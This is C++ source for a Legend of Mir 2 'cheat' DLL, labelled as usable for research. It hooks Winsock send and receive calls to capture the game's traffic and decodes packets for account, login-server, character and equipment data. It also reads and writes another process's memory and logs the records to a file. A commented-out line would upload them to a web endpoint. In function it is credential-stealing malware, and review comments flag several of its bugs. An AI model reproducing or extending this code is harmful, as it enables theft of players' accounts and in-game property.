📄 hook.cpp

📁 M2的外挂。C语言的! 可以做研究用途
#include "posturl.h"
#include "code.h"
#include "sockstrs.h"

// Function pointers to the Debug/Trace DLL entry points.
// Set by DTHookInitialize(), cleared by DTHookShutdown(), and read back by
// GetPreApiNotifyFP() / GetPostApiNotifyFP().
static LPFNWSANOTIFY PreApiNotifyFP  = NULL;
static LPFNWSANOTIFY PostApiNotifyFP = NULL;


// Handle to the Debug/Trace DLL module.
// Only released here (DTHookShutdown()); nothing in this file assigns it,
// so it is presumably loaded elsewhere in the project -- verify.
static HMODULE       DTDll = NULL;

// (The notification functions receive their arguments directly; no shared
// static string is defined in this file.)

// Accessor for the pre-call notification callback installed by
// DTHookInitialize(); NULL before that and after DTHookShutdown().
LPFNWSANOTIFY GetPreApiNotifyFP(void)
{
    LPFNWSANOTIFY fp = PreApiNotifyFP;
    return fp;
}

// Accessor for the post-call notification callback installed by
// DTHookInitialize(); NULL before that and after DTHookShutdown().
LPFNWSANOTIFY GetPostApiNotifyFP(void)
{
    LPFNWSANOTIFY fp = PostApiNotifyFP;
    return fp;
}

// Pre-call hook. This DLL does no work before the Winsock call, so it always
// returns FALSE; the parameters exist only to match the LPFNWSANOTIFY
// signature that DTHookInitialize() installs it under.
BOOL WINAPIV PreApiNotify(
    IN  INT    NotificationCode,
    OUT LPVOID ReturnCode,
    IN  LPSTR  LibraryName,
    ...)
{
	(void)NotificationCode;
	(void)ReturnCode;
	(void)LibraryName;
	return FALSE;
}

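// Helper macro for the hook functions below.
// Evaluates to the smaller of x and y. Every argument and the whole expansion
// are parenthesised so the macro composes correctly inside larger expressions
// (the previous form `(x<y)?x:y` mis-bound in e.g. `MIN(a, b) + c` and
// `2 * MIN(a, b)`). Arguments may still be evaluated twice, so do not pass
// expressions with side effects.
#define MIN(x, y) (((x) < (y)) ? (x) : (y))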

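// Maps a packet command number to its slot in the per-command data table
// (pDatas[] in SaveThread()); returns -1 when the command is not tracked.
//
// Tracked commands by slot (from the original author's notes):
//   0  0x07D1  account
//   1  0x0212  server connection info
//   2  0x0208  character info
//   3  0x0067  selected character
//   4  0x0068  selected server
//   5  0x020D  login server info
//   6  0x00C9  bag / inventory equipment
//   7  0x026D  worn equipment
//   8  0x0036  location
//
// The table is static const so it is not rebuilt on every call. It keeps
// CMD_COUNT entries so slots line up with pDatas[CMD_COUNT]; if CMD_COUNT
// exceeds the nine initialisers the remaining entries are zero, exactly as
// before.
inline int GetIndex( WORD nCmdNo )
{
	static const WORD pCmds[CMD_COUNT] =
		{ 0x07D1, 0x0212, 0x0208, 0x0067, 0x0068, 0x020D, 0x00C9, 0x026D, 0x0036 };
	for ( size_t i = 0; i < sizeof(pCmds)/sizeof(pCmds[0]); i++ )
	{
		if ( pCmds[i] == nCmdNo )
			return (int)i;
	}
	return -1;
}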

// Appends lpDebugMsg plus a newline to DEBUG_FILENAME, creating the file on
// first use. Write failures are not reported.
inline void DEBUG_TOFILE( char *lpDebugMsg )
{
	OFSTRUCT ofs;
	HFILE hf = OpenFile( DEBUG_FILENAME, &ofs, OF_READWRITE );
	if ( hf == HFILE_ERROR )
		hf = OpenFile( DEBUG_FILENAME, &ofs, OF_CREATE );
	if ( hf == HFILE_ERROR )
		return;

	DWORD cbWritten;
	SetFilePointer( (HANDLE)hf, 0, 0, FILE_END );
	WriteFile( (HANDLE)hf, lpDebugMsg, strlen( lpDebugMsg ), &cbWritten, NULL );
	WriteFile( (HANDLE)hf, "\n", 1, &cbWritten, NULL );
	CloseHandle( (HANDLE)hf );
}

// Appends dwSize raw bytes from lpBuffer plus a newline to DAT_FILENAME,
// creating the file on first use. Write failures are not reported.
inline void WriteData( LPVOID lpBuffer, DWORD dwSize )
{
	OFSTRUCT ofs;
	HFILE hf = OpenFile( DAT_FILENAME, &ofs, OF_READWRITE );
	if ( hf == HFILE_ERROR )
		hf = OpenFile( DAT_FILENAME, &ofs, OF_CREATE );
	if ( hf == HFILE_ERROR )
		return;

	DWORD cbWritten;
	SetFilePointer( (HANDLE)hf, 0, NULL, FILE_END );
	WriteFile( (HANDLE)hf, lpBuffer, dwSize, &cbWritten, NULL );
	WriteFile( (HANDLE)hf, "\n", 1, &cbWritten, NULL );
	CloseHandle( (HANDLE)hf );
}

// Worker thread started by SendData(); lpParam is an LPTHREADPARAM that this
// thread owns (deleted at the end, after closing its ThreadHandle).
// Steps: open the process named in lpParam, copy the captured packet region
// (lpAddress / cbSize) out of it, walk every '#'...'!' framed command,
// DecodeEx() it, keep the decoded payload of each tracked command in pDatas[]
// (slot = GetIndex()), then format all slots with STRING_UPDATE and append
// the line to DAT_FILENAME through WriteData() -- but only when slot 1 (the
// 0x0212 server-connection record) is non-empty. The PostURL() upload is
// commented out, so the data file is the only output.
// Always returns 0.
DWORD WINAPI SaveThread( LPVOID lpParam )
{
	HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS,
								FALSE,
								((LPTHREADPARAM)lpParam)->dwProcessId );
	
	// NOTE(review): unlike the normal exit below, this path neither deletes
	// lpParam nor closes its ThreadHandle.
	if ( !hProcess ) return 0;

	// The allocation is not checked before ReadProcessMemory() uses it.
	LPVOID lpBuffer = malloc( ((LPTHREADPARAM)lpParam)->cbSize );
	DWORD dwReadByte;
	// One slot per tracked command (indexed by GetIndex()); NULL until seen.
	char* pDatas[CMD_COUNT] = { 0, 0, 0, 0, 0, 0, 0, 0, 0 };
	
	if ( ReadProcessMemory( hProcess,
							((LPTHREADPARAM)lpParam)->lpAddress,
							lpBuffer,
							((LPTHREADPARAM)lpParam)->cbSize,
							&dwReadByte ) )
	{
		// Commands are framed as '#'...'!'. strchr() needs a NUL-terminated
		// buffer and nothing here adds a terminator -- TODO confirm the
		// captured region always carries one.
		char* lpCmdStr = strchr( (char*)lpBuffer, '#' );
		while ( lpCmdStr &&	(DWORD)lpCmdStr - (DWORD)lpBuffer < dwReadByte )
		{
			char* lpCmdEnd = strchr( lpCmdStr, '!' );
				
			if ( lpCmdEnd && lpCmdEnd > lpCmdStr )
			{
				long nSize = (long)lpCmdEnd - (long)lpCmdStr;
				// NOTE(review): this lpBuffer shadows the outer one. It is
				// freed only inside the equipment branch below, so the
				// "other data" branch and the untracked-command case leak it.
				char* lpBuffer = (char*)malloc( nSize + 1 );
				memset( lpBuffer, 0, nSize + 1 );
				// The decoded message starts with an MMSG header (wCmd, data).
				DWORD dwSize = DecodeEx( lpCmdStr, lpBuffer, nSize, nSize );
				int iIndex = GetIndex( ((LPMMSG)lpBuffer)->wCmd );
				// Accumulates "_"-joined item names for the equipment commands.
				char szBuffer[2048];
				szBuffer[0] = 0;

				if ( iIndex > -1 )
				{
					if( iIndex == 6 || iIndex == 7 )// equipment data (0x00C9 / 0x026D)
					{
						char szName[15];
						MIR2_EQUIP_ITEM Mir2Item;
						// NOTE(review): sizeof(LPMMSG) is the size of the pointer
						// type, not of the message header -- the struct was
						// probably intended; confirm against code.h.
						DWORD dwDataSize = ( dwSize - sizeof(LPMMSG) ) * 2;
						char* lpHex = (char*)malloc( dwDataSize );
						BinToHex( ((LPMMSG)lpBuffer)->data, lpHex, dwDataSize / 2 );
						// The index formula suggests each item occupies
						// sizeof(MIR2_EQUIP_ITEM)*2 hex digits plus one separator
						// byte in the hex text -- assumption, verify against BinToHex().
						for ( long i = 0; (DWORD)i < dwSize / sizeof( MIR2_EQUIP_ITEM ); i++ )
						{
							HexToBin( (char*)(&lpHex[ (sizeof( MIR2_EQUIP_ITEM ) * 2+1) * i ]),
									  (char*)&Mir2Item,
									  sizeof(MIR2_EQUIP_ITEM) );
							// catch(...) only intercepts C++ exceptions; a cbLen
							// that runs past szName[15] is an overrun, not an
							// exception. szName stays unset if the copy does throw.
							try
							{
								lstrcpyn( szName, Mir2Item.szName, Mir2Item.cbLen + 1 );
							}
							catch(...)
							{
							}
							// De-duplicate names; the strcat() into szBuffer is unbounded.
							if ( ! strstr( szBuffer, szName ) )
							{
								if ( i > 0 )
									strcat( szBuffer, "_" );
								strcat( szBuffer, szName );
							}
						}

						free( lpHex );
						// Keep only the first equipment list seen for this slot.
						if ( !pDatas[iIndex] )
						{
							pDatas[iIndex] = (char*)malloc( strlen( szBuffer ) + 1 );
							strcpy( pDatas[iIndex], szBuffer );
						}
						free( lpBuffer );
					}
					else // other data: store the message payload as a string
					{
						// NOTE(review): the condition is inverted -- free() runs only
						// while the slot is still NULL (a no-op), so an earlier copy
						// leaks when replaced. The two indented lines below are NOT
						// part of the if: they always run, so for these slots the
						// last message seen wins.
						if ( !pDatas[iIndex] ) free( pDatas[iIndex] );
							pDatas[iIndex] = (char*)malloc( strlen( ((LPMMSG)lpBuffer)->data ) + 1 );
							strcpy( pDatas[iIndex], ((LPMMSG)lpBuffer)->data );
					}
				}
			}else break;
			lpCmdStr = strchr( (char*)lpCmdEnd, '#' );
		}
	}

	free( lpBuffer );
	CloseHandle( hProcess );

	// Replace empty slots with "" so every %s in STRING_UPDATE gets a string.
	// (The loop variable i is reused by the final free loop below; this
	// relies on pre-standard for-scope rules of old MSVC.)
	int nDataSize = 0;
	for ( long i = 0; i < sizeof(pDatas)/sizeof(char*); i++ )
	{
		if ( pDatas[i] )
			nDataSize += strlen( pDatas[i] );
		else
		{
			pDatas[i] = (char*)malloc( 1 );
			memset( pDatas[i], 0, 1 );
		}
	}

	// Size = format length + slot data + area name. There is no explicit +1
	// for the NUL, so this relies on the "%s" specifier characters of
	// STRING_UPDATE covering it -- verify. wsprintf() also caps its output
	// at 1024 bytes, so long records are truncated.
	char* lpszParam = (char*)malloc(strlen( STRING_UPDATE ) + 
									nDataSize +
									strlen( ((LPTHREADPARAM)lpParam)->szMir2Are ));
	wsprintf(	lpszParam,
				STRING_UPDATE,
				((LPTHREADPARAM)lpParam)->szMir2Are,
				pDatas[0], pDatas[1], pDatas[2], pDatas[3], pDatas[4],
				pDatas[5], pDatas[6], pDatas[7], pDatas[8] );
	// Only records containing the server-connection message (slot 1) are
	// written out; the network upload below is disabled.
	if ( strlen( pDatas[1] ) > 0 )
		WriteData( lpszParam, strlen( lpszParam ) );
		//PostURL( "http://127.0.0.1/mir2/recnew.asp", lpszParam );
	free( lpszParam );
	for ( i = 0; i < sizeof(pDatas)/sizeof(char*); i++ ) if ( pDatas[ i ] ) free( pDatas[ i ] );
	CloseHandle( ((LPTHREADPARAM)lpParam)->ThreadHandle );
	delete (LPTHREADPARAM)lpParam;
	return 0;
}

// Returns true once both equipment commands (0x00C9 and 0x026D) have been
// found, each fully framed as '#'...'!', within the first cbSize bytes of
// lpDataBuffer. WriteStorage() uses this to decide that the captured stream
// is complete and can be handed to SendData(). Returns false for a NULL buffer.
inline bool IsEnd( char* lpDataBuffer, DWORD cbSize )
{
	bool bResult = false;
	if ( lpDataBuffer )
	{
		WORD nCmds[2] = { 0x00C9, 0x026D };// the two equipment commands; an entry is zeroed once seen
		// strchr() requires a NUL terminator inside lpDataBuffer -- TODO confirm
		// the storage region always has one.
		char* lpCmdStr = strchr( lpDataBuffer, '#' );
		while ( lpCmdStr &&	(long)lpCmdStr - (long)lpDataBuffer < (long)cbSize )
		{
			char* lpCmdEnd = strchr( lpCmdStr, '!' );
			if ( lpCmdEnd && lpCmdEnd > lpCmdStr )
			{
				long nSize = (long)lpCmdEnd - (long)lpCmdStr;
				// malloc result is not checked before memset()/DecodeEx().
				char* lpBuffer = (char*)malloc( nSize + 1 );
				memset( lpBuffer, 0, nSize + 1 );
				// dwSize is computed but not used below.
				DWORD dwSize = DecodeEx( lpCmdStr, lpBuffer, nSize, nSize );
				// Mark a command as seen. The strstr( lpCmdStr, "!" ) test is
				// always true at this point because lpCmdEnd was just found.
				for ( int i = 0; i < sizeof(nCmds)/sizeof(WORD); i++ )
				{
					if ( nCmds[i] && ((LPMMSG)lpBuffer)->wCmd == nCmds[i] && strstr( lpCmdStr, "!" ) )
						nCmds[i] = 0;
				}
				// Done when every entry has been zeroed. (i is reused from the
				// previous for -- relies on pre-standard for-scope rules.)
				for ( i = 0; i < sizeof(nCmds)/sizeof(WORD); i++ )
				{
					bResult = (nCmds[i] == 0);
					if ( !bResult ) break;
				}
				free( lpBuffer );
				if ( bResult ) break;
			}
			else break;
			lpCmdStr = strchr( (char*)lpCmdEnd, '#' );
		}
	}
	return bResult;
}

// Locates the area/server selection combo box (class ARE_SELECTCLASS) that is
// a child of a top-level window of class MIR2_CLASSNAME. Walks the sibling
// chain that starts at GW_HWNDFIRST of the window FindWindow() returns and
// stops at the first match; returns NULL when none is found.
inline HWND FindMir2Select( void )
{
	char szClass[1024];
	HWND hFound = NULL;

	HWND hWnd = GetWindow( FindWindow( MIR2_CLASSNAME, NULL ), GW_HWNDFIRST );
	for ( ; IsWindow( hWnd ); hWnd = GetWindow( hWnd, GW_HWNDNEXT ) )
	{
		GetClassName( hWnd, szClass, sizeof(szClass) - 1 );
		if ( strcmpi( szClass, MIR2_CLASSNAME ) != 0 )
			continue;
		hFound = FindWindowEx( hWnd, NULL, ARE_SELECTCLASS, NULL );
		if ( hFound )
			break;
	}
	return hFound;
}

// Packages a completed capture (owning process id, storage address, payload
// size) into a heap-allocated THREADPARAM, copies the currently selected
// area/server name from the selection combo box into it, and starts
// SaveThread() on it. On success SaveThread() owns lpParam and deletes it;
// if CreateThread() fails it is deleted here.
inline void SendData( DWORD dwProcessId, LPVOID lpAddress, DWORD cbSize )
{
	LPTHREADPARAM lpParam = new THREADPARAM;
	// hBox may be NULL (FindMir2Select() found nothing) and is not checked.
	// CB_GETLBTEXT copies into szMir2Are with no length limit, so szMir2Are
	// must be large enough for any list entry -- TODO confirm its size.
	HWND hBox = FindMir2Select();
	SendMessage(hBox,
				CB_GETLBTEXT,
				SendMessage( hBox, CB_GETCURSEL, 0, 0 ),
				(LPARAM) lpParam->szMir2Are );
	DWORD ThreadId;
	lpParam->dwProcessId= dwProcessId;
	lpParam->lpAddress	= lpAddress;
	lpParam->cbSize		= cbSize;
	// Created suspended, presumably so ThreadHandle is stored before the thread
	// can run (SaveThread() closes it on exit). NULL for dwStackSize selects
	// the default stack size.
	lpParam->ThreadHandle =
		CreateThread(	NULL,
						NULL,
						SaveThread,
						lpParam,
						CREATE_SUSPENDED, 
						&ThreadId );
	if ( lpParam->ThreadHandle == 0 )
		delete lpParam;
	else ResumeThread( lpParam->ThreadHandle );
}

// Decides whether window hwnd belongs to "our" process tree: true when the
// window's owning process is the current process, or when the current
// process is a direct child of that owner (looked up through a Toolhelp
// process snapshot). False for a NULL window or when the current process is
// not found in the snapshot.
// NOTE: CreateToolhelp32Snapshot() reports failure with INVALID_HANDLE_VALUE,
// not NULL, so the handle test below never rejects a failed snapshot.
inline bool IsMir2Data( HWND hwnd )
{
	if ( !hwnd ) return false;

	DWORD dwOwnerPid;
	GetWindowThreadProcessId( hwnd, &dwOwnerPid );
	const DWORD dwSelfPid = GetCurrentProcessId();
	if ( dwOwnerPid == dwSelfPid ) return true;

	bool bChildOfOwner = false;
	HANDLE hSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
	if ( !hSnap ) return bChildOfOwner;

	PROCESSENTRY32 pe;
	pe.dwSize = sizeof( pe );
	for ( BOOL bMore = Process32First( hSnap, &pe ); bMore; bMore = Process32Next( hSnap, &pe ) )
	{
		if ( pe.th32ProcessID != dwSelfPid )
			continue;
		bChildOfOwner = ( pe.th32ParentProcessID == dwOwnerPid );
		break;
	}
	CloseHandle( hSnap );
	return bChildOfOwner;
}

// Appends lpBuffer to the shared capture block of the game process and, once
// IsEnd() reports the stream complete, hands it to SendData().
// The block is located through the area-selection combo box hMir: item 0's
// item-data holds the block address and item 1's holds the owning process id
// (both published by PostApiNotify()). The block starts with a DWORD that
// counts the bytes used so far, including that DWORD.
inline void WriteStorage( HWND hMir, char *lpBuffer, DWORD dwBufferSize )
{
	LPVOID lpvAddress = (LPVOID)SendMessage( hMir,
									CB_GETITEMDATA,
									0,
									0 );
	if ( lpvAddress )
	{
		DWORD dwProcessId = (DWORD)SendMessage( hMir,
									CB_GETITEMDATA,
									1,
									0 );
		if ( dwProcessId )
		{
			HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS,
									FALSE,
									dwProcessId );

			// Local copy of the whole block, handed to IsEnd().
			char szBuffer[STORAGE_SIZE];

			if ( hProcess )
			{
				// Read the current used-size header.
				DWORD dwReadSize;
				DWORD dwWritten;
				if ( !ReadProcessMemory( hProcess,
								lpvAddress,
								&dwReadSize,
								sizeof(DWORD),
								&dwWritten ) )
				{
					CloseHandle( hProcess );
					return;
				}
				// NOTE(review): with the two DWORD operands the subtraction is
				// unsigned, so the expression can never be negative and this
				// check always passes -- neither the block nor szBuffer (which
				// the read-back below fills with dwReadSize bytes) is actually
				// bounds-checked.
				if ( STORAGE_SIZE - dwReadSize - dwBufferSize >= 0 )
				{
					// Write the data: stop at the first NUL or at dwBufferSize
					// (strlen() assumes lpBuffer is NUL-terminated -- TODO confirm).
					DWORD cbSize = MIN( dwBufferSize, strlen( lpBuffer ) );

					// Append the payload, update the size header in place
					// (dwReadSize += dwWritten is a side effect inside the
					// argument list), read the whole block back and test for
					// completeness; each step is skipped if the previous one fails.
					if ( WriteProcessMemory( hProcess,
									(LPVOID)((DWORD)lpvAddress + dwReadSize),
									lpBuffer,
									cbSize,
									&dwWritten ) &&
						 WriteProcessMemory( hProcess,
									lpvAddress,
									&(dwReadSize += dwWritten),
									sizeof(DWORD),
									&dwWritten ) &&
						 ReadProcessMemory( hProcess,
									lpvAddress,
									szBuffer,
									dwReadSize,
									&dwWritten ) &&
						 IsEnd( &szBuffer[sizeof(DWORD)],
								dwWritten-sizeof(DWORD) ) )
					{
						// Clear the published address so nothing more is
						// appended, then let SaveThread() process the payload
						// that follows the size header.
						SendMessage( hMir,
									CB_SETITEMDATA,
									0,
									0 );
						CloseHandle( hProcess );
						SendData( dwProcessId, 
							(LPVOID)((long)lpvAddress+sizeof(DWORD)),
							dwWritten - sizeof(DWORD) );
						return;
					}
				}
				CloseHandle( hProcess );
			}
		}
	}
}

// Post-call hook for the Winsock send/recv family. The Debug/Trace layer
// calls it after the real API with the call's buffers, so this is where
// traffic of the process that owns the area-selection window is copied into
// the shared capture block (see WriteStorage()). Only the first WSABUF is
// examined. Always returns FALSE; the return value does not alter the call.
BOOL WINAPIV PostApiNotify(
    IN  INT    NotificationCode,
    OUT LPVOID ReturnCode,
    IN  LPSTR  LibraryName,
    IN  SOCKET* s,
	IN  LPWSABUF*	lpBuffers,
	IN  DWORD*		dwBufferCount,
	...)
{
	switch( NotificationCode )
	{
		// Outbound data
		case DTCODE_WSPSend: case DTCODE_WSPSendTo:
		case DTCODE_send:    case DTCODE_sendto:
			if ((DWORD)(*dwBufferCount) > 0 && ((LPWSABUF)(*lpBuffers))->len > 1 )
			{
				char* pBuffer = ((LPWSABUF)(*lpBuffers))->buf;
				if ( !pBuffer ) return false;
				HWND hMirBox = FindMir2Select();
				DWORD cbBuffer = ((LPWSABUF)(*lpBuffers))->len;
				if ( !IsMir2Data( hMirBox ) ) return false;
				// strcmp() assumes the send buffer is NUL-terminated -- TODO confirm.
				if ( strcmp( pBuffer, STRING_MIR152 ) == 0 )// create the capture block
				{
					// One STORAGE_SIZE block in this process; its first DWORD is
					// the used-size counter, initialised to sizeof(DWORD).
					LPVOID lpvAddress = VirtualAlloc( NULL,
													STORAGE_SIZE,
													MEM_COMMIT | MEM_RESERVE,
													PAGE_READWRITE );
					if ( !lpvAddress ) return false;
					DWORD dwWritten = sizeof( DWORD );
					// Write the size header (through WriteProcessMemory on our
					// own process; a plain store would presumably do the same).
					HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS,
											FALSE,
											GetCurrentProcessId() );
					if ( !hProcess )
					{
						// NOTE(review): MEM_RESERVE is not a valid VirtualFree
						// free type (MEM_RELEASE / MEM_DECOMMIT are), so this
						// call fails and the block is leaked.
						VirtualFree( lpvAddress, 0, MEM_RESERVE );
						return false;
					}
					if ( WriteProcessMemory( hProcess,
											lpvAddress,
											&dwWritten,
											dwWritten,
											&dwWritten ) )
					{
						// Publish the block address (item 0) and our process id
						// (item 1) as the combo box's item data; WriteStorage()
						// reads them back from this process or a child (IsMir2Data()).
						if ( SendMessage( hMirBox,
									CB_SETITEMDATA,
									0,
									(LPARAM)lpvAddress ) == CB_ERR ||
							 SendMessage( hMirBox,
									CB_SETITEMDATA,
									1,
									(LPARAM)GetCurrentProcessId() ) == CB_ERR )
						{
							// A failed publish is ignored (the early return is commented out).
							//return false;
						}
					}
					CloseHandle( hProcess );
				} else WriteStorage( hMirBox, pBuffer, cbBuffer );
			}
			break;

		// Inbound data
		case DTCODE_WSPRecv: case DTCODE_WSPRecvFrom:
		case DTCODE_recv: 	 case DTCODE_recvfrom:
			if ((DWORD)(*dwBufferCount) > 0 && ((LPWSABUF)(*lpBuffers))->len > 1 )
			{
				HWND hMirBox = FindMir2Select();
				char *pBuffer = ((LPWSABUF)(*lpBuffers))->buf;
				if ( !pBuffer ) return false;
				if ( IsMir2Data( hMirBox ) )
				{
					DWORD cbBuffer = ((LPWSABUF)(*lpBuffers))->len;
					WriteStorage( hMirBox, pBuffer, cbBuffer );
				}
			}
			break;		
	}
	return false;
}

// Debug/Trace DLL entry: installs this file's pre/post notification
// callbacks. lpszLibName is accepted for interface compatibility and ignored.
void DTHookInitialize(char* lpszLibName)
{
	(void)lpszLibName;
	PreApiNotifyFP  = &PreApiNotify;
	PostApiNotifyFP = (LPFNWSANOTIFY)&PostApiNotify;
}

// Debug/Trace DLL exit: releases DTDll if it was loaded (the handle itself is
// not reset) and clears both callback pointers so the getters return NULL.
void DTHookShutdown(void)
{
    if (DTDll)
    {
        FreeLibrary(DTDll);
    }
    PostApiNotifyFP = NULL;
    PreApiNotifyFP  = NULL;
}
